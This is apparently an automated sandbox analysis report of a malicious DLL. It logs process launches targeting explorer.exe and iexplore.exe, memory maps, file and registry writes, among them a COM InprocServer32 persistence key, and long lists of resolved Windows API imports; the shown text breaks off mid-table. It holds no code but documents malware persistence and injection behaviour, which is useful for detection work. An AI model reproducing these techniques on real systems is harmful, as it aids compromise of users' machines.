1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #57: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #57 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd30 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D34
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x002a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00500fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0059ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x0119ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0136ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001370000 | 0x01370000 | 0x014effff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = explorer.exe, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98280 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #58: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #58 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd3c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x005b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x011bffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013cffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
